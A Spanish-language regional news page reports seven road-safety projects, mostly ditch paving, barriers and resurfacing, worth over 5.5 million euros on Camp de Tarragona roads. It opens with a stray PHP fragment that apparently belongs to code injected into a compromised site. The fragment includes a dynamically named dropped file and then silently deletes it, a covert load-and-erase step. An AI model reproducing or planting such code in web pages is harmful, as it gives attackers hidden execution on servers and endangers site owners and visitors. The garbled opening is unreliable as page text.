");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Territorio y Sostenibilidad destina más de 5,5 millones de euros en mejoras de la seguridad vial en el Camp de Tarragona
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Territorio y Sostenibilidad destina más de 5,5 millones de euros en mejoras de la seguridad vial en el Camp de Tarragona (02/06/2020)

El Departamento de Territorio y Sostenibilidad ha impulsado las redacciones de siete proyectos constructivos que definirán actuaciones para mejorar la seguridad vial en varias carreteras del Camp de Tarragona que comportarán una inversión de más de 5,5 millones de euros. Los trabajos abarcarán 60 kilómetros de nueve carreteras de la Conca de Barberà, Priorat, Tarragonès y el Baix Camp.

Estas actuaciones se enmarcan principalmente en un programa de pavimentación de cunetas, que permitirá dar un sobreancho a varios tramos de carretera, con el objetivo de favorecer la seguridad y la comodidad en la conducción. Asimismo, los trabajos, en función de los casos, se complementan con la mejora del firme y la renovación de las barreras de seguridad.

En concreto, los proyectos que ahora se impulsan son:

• Pavimentación de cunetas y adecuación de las barreras de seguridad en la T-224, entre Santa Coloma de Queralt y Vallfogona de Riucorb (Conca de Barberà). Longitud: 14 kilómetros. La redacción del proyecto se licita por un importe de 52.000 euros y un plazo de cinco meses. Inversión prevista para la obra: 800.000 euros.

• Pavimentación de cunetas, adecuación de las barreras de seguridad y mejora de firme en la C-242 en Cornudella de Montsant (Priorat). Longitud: 9 kilómetros. La redacción del proyecto se ha licitado por un valor de 82.000 euros y un plazo de cinco meses. Inversión estimada de la obra: 1,6 millones de euros.

• Pavimentación de cunetas en la TV-3001 y TV-3031, entre la Torre de Fontaubella, Marçà y Pradell de la Teixeta (Priorat). El tramo donde se actuará tiene una longitud de 12 kilómetros. El proyecto se ha licitado por un importe de 38.000 euros y un plazo de redacción de cuatro meses. Se prevé para la obra una inversión de 420.000 euros.

• Pavimentación de cunetas, adecuación de las barreras de seguridad y mejora de firme en la T-242, entre Ulldemolins y Juncosa (Priorat y las Garrigues). El tramo que se mejorará tiene una longitud de 10 kilómetros. La redacción del proyecto se licita por un importe de 82.000 euros y un plazo de cinco meses. La inversión prevista para esta actuación es de 1,6 millones de euros.

• Mejora del firme y de las barreras de seguridad en la T-204, entre Montferri y Salomón (Alt Camp y Tarragonès). Longitud: 4 kilómetros. El proyecto se ha licitado por un importe de 43.000 euros y un plazo de redacción de cinco meses. El presupuesto estimado de la obra es de 600.000 euros.

• Pavimentación de cunetas, adecuación de las barreras de seguridad y mejora de firme en la T-214, entre Altafulla y la Riera de Gaià. (Tarragonès). Longitud: 2 kilómetros. La redacción del proyecto se ha licitado por un importe de 30.000 euros y un plazo de cinco meses. Se prevé que la obra tenga un presupuesto de 260.000 euros.

• Pavimentación de cunetas en la T-723 y TV-7005, entre Mont-roig del Camp, Prades y Vilanova de Prades (Baix Camp). Longitud del tramo: 8,8 kilómetros. El proyecto se ha licitado por un importe de 38.000 euros y un plazo de redacción de cuatro meses. El presupuesto estimado para la ejecución de la obra es de 350.000 euros.

Fuente: Departamento de Territorio y Sostenibilidad

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona